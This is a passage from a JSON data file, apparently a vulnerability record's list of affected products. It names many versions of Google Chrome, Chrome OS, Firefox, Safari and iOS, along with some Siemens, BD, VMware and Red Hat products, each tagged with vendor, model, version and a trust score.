        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.2"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.358.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.151"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.52"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.22"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.754.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.223.1"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.85"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.107"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2.0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.58"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "31.6"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.0.5"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.2.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.24"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.73"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1007"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1659.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.783.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "16.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.19"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1047"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1052"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "45"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.78"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.51"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.51"
      },
      {
        "_id": null,
        "model": "simatic ipc277e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "39"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.17"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1690.0"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2.0"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.308"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.820.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.46"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1044.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.56"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.109"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.343"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.432.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.731.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.249.89"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.560.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.0.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.80"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.819.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.324.0"
      },
      {
        "_id": null,
        "model": "enterprise linux for power big endian extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.31"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.28"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1048"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "54.0.2840.59"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.125"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1032.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.162"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.29"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.3.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.433.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.117"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.0.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.80"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.201"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.27"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.94"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.612.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.28"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.52"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "38.0.2125.122"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.153"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.4.154.18"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.52"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.201"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1687.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.22"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.18"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.28"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.903.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.51"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.672.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.733.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.749.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.48"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.113"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.762.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.48"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.719.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "34"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.12"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.29"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.72"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.271.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.813.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.7"
      },
      {
        "_id": null,
        "model": "assurity linc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.237"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.38"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.53"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.77"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.0.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.28"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.211"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.622.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.17"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.673.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.106"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.1"
      },
      {
        "_id": null,
        "model": "accuri c6 plus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "simatic ipc477c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.3.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1063.1"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.1"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.187"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1055.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.383.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.790.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.465.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.77"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.51"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.319"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.33"
      },
      {
        "_id": null,
        "model": "fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.24"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.658.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "48.0.2564.116"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "51.0.2704.103"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1668.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.89"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.7"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.80"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.932.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.13"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "29.0.1"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.101"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.34"
      },
      {
        "_id": null,
        "model": "pyxis infant care verification",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "31"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.21"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.34"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.41"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.114"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "49.0.2623.108"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1064.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.23"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.686.0"
      },
      {
        "_id": null,
        "model": "pyxis supplystation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.24"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1651.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1003.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.95"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.22"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.322.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.45"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.49"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.391.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.107"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.6"
      },
      {
        "_id": null,
        "model": "identity manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "2.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1664.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.40"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.18"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.0.7"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.89"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "64.0.3282.167"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.2"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.0.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.81"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.47"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1031"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.49"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.18"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "58.0.3029.89"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1007.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.40"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.326.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.22"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.62"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1680.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.603.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.39"
      },
      {
        "_id": null,
        "model": "sinema remote connect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
